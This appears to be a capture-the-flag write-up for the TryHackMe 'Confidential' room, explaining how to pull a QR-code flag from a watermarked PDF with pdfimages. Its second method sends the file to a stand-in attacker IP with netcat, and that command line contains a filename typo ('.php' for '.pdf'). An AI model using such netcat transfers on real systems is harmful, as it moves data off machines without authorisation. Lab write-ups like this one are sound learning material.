TryHackMe Confidential – Write-up
In this post, we will discuss how to get the flag for the Confidential box. This box is a little different from other boxes. It is not a typical boot-to-root box. Let’s start the box. Press the split screen button to view a desktop GUI. This box contains a single PDF file that got watermarked. You can complete this box in two different ways. We will explain them both.
First, open the /home/ubuntu/confidential/Repdf.pdf file to find the following image:
As you can see, the image got watermarked by a red exclamation mark. We will now discuss the steps you should take to obtain the flag.
TryHackMe Confidential – Path to Flag #1
The first way to clear this box is by using a tool called: pdfimages. You can use this tool to extract images from PDF files. When reading the outcome of the pdfimages --help command, we see the following:
Copyright 2005-2022 The Poppler Developers - http://poppler.freedesktop.org
Copyright 1996-2011 Glyph & Cog, LLC
Usage: pdfimages [options]
-f : first page to convert
-l : last page to convert
-png : change the default output format to PNG
-tiff : change the default output format to TIFF
-j : write JPEG images as JPEG files
-jp2 : write JPEG2000 images as JP2 files
-jbig2 : write JBIG2 images as JBIG2 files
-ccitt : write CCITT images as CCITT files
-all : equivalent to -png -tiff -j -jp2 -jbig2 -ccitt
-list : print list of images instead of saving
-opw : owner password (for encrypted files)
-upw : user password (for encrypted files)
-p : include page numbers in output file names
-q : don't print any messages or errors
-v : print copyright and version info
-h : print usage information
-help : print usage information
--help : print usage information
-? : print usage informationWe can see that we have to use the -all option to test for all different image extensions. We have to fill in the <image-root> required option with the first characters of the output files. Thus, filling in obz as the <image-root>, you will get file names like: obz-000.png. So in order to extract all images from the Repdf.pdf, we have to execute the following command:
pdfimages -all Repdf.pdf obzIf you execute the command correctly, you will find three generated image files. The first one is named: obz-000.png. This file contains the flag. Open the image and scan the QR code. You will capture the flag when reading the output.
TryHackMe Confidential – Path to Flag #2
The second path to root this box involves downloading this PDF file to your attacking machine. On your attacking machine run:
nc -lvnp 9001 > Repdf.pdfOn the box, run the following command to send over the Repdf.pdf file.
nc <ATATACKING_IP> 9001 < Repdf.phpNote: you can stop the download after you are sure 104KB of data has been sent over. This download should not take long, but you can wait 10 seconds to stop the transfer.
If you are running a Ubuntu machine, you have a default document reader installed named Evince. Open the document in this application. Right-click on the QR code and click on Save Image as... Give the image a convenient name. After saving the image, open the image in your favorite image viewer. You should now be able to view the QR code without a watermark.
Finding the flag for this box was not too hard. I had fun separating the images from the PDF file.
